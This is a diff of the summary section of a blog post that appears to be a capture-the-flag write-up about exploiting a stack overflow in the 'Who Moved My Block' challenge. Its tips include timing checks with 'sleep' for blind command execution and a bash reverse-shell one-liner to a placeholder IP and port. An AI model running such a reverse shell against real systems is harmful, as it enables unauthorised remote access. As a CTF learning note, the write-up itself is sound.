n132/n132.github.io/_posts/2022-01-23-WhoMovedMyBlock.md

     exploit(r)
 ```

-# Skills
+# Summary

+It’s an interesting challenge and it’s really “real”.
+That’s what we would meet in the real life.
+We may learn lots of heap vulnerability exploiting skills in CTF but in daily work, exploiting through Stack Overflow is a more common situation!

-I learned some useful skills from my teammates:
+I learned some useful skills from my teammates during the contest:

-1. Use sleep xxx; to judge if the remote server is running our command.
+- Use `sleep xxx;` to judge if the remote server is running our command.
-2. System function behave different as the shell. `bash -c 'exec bash -i &>/dev/tcp/<>ip address/<port> <&1';` could work well.
-Before attack remotely, we could test the command locally first `system(<cmd>)` .
+- `system` in `C` behave differently from the shell. `bash -c 'exec bash -i &>/dev/tcp/<ip address>/<port> <&1';` could work well.
+Before attacking remotely, we could test the command locally first.